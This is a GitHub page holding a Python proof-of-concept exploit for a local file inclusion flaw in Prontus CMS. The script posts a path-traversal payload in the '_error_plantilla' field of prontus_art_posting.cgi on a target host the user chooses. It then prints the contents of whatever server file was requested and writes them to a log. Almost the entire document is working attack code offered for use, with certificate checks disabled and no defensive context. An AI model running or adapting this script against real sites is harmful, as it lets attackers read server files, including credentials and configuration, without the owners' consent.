exploits/prontus-lfi.py at main · ilv/exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/python3
# isra
import re
import ssl
import argparse
import requests
from urllib import request, parse

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

def check_lfi(host, file, prontus_id, idf, ssl):
	""" """
	print("[+] Starting...")

	with open("{}.log".format(host), "a+") as log_file:
		log_file.write("\nChecking host {}\n".format(host))

		if(ssl):
			host = "https://{}".format(host)
		else:
			host = "http://{}".format(host)


		url_cgi = "{}/cgi-bin/prontus_art_posting.cgi".format(host)
		data1 = {"_NP": prontus_id, "_IDF": idf}
		data2 = {"_NP": prontus_id, "_IDF": idf, "_error_plantilla": "../../../../../../../../../../{}".format(file)}

		# check prontus id & form id
		print("[+] Checking Prontus ID and Form ID params.")
		req = requests.post(url_cgi, data1, verify=False)
		if "Error en los datos enviados" in str(req.text):
			print("[-] Prontus ID or Form ID not valid. Exiting...\n")
			return

		# do it
		print("[+] Sending payload & parsing content...\n")
		req = requests.post(url_cgi, data2, verify=False)
		print("Got reply from {}:\n".format(host))
		print("{}\n".format(req.text))
		log_file.write("Got reply from {}:\n".format(host))
		log_file.write("{}\n".format(req.text))

def main():
	parser = argparse.ArgumentParser()
	parser.add_argument("host", help="Target host")
	parser.add_argument("file", help="Local file to include")
	parser.add_argument("--prontus", default="nivel4", help="Target Prontus ID")
	parser.add_argument("--form", default="postingform", help="Target form ID")
	parser.add_argument("--ssl", help="Enable SSL", action="store_true")
	args = parser.parse_args()

	print("#"*80)
	print("\n***** Prontus CMS LFI PoC *****")
	print("[+] Host: {}".format(args.host))
	print("[+] File: {}".format(args.file))
	print("[+] Prontus ID: {}".format(args.prontus))
	print("[+] Form ID: {}".format(args.form))
	print("[+] SSL: {}".format(args.ssl))
	check_lfi(args.host, args.file, args.prontus, args.form, args.ssl)

if __name__ == "__main__":
	main()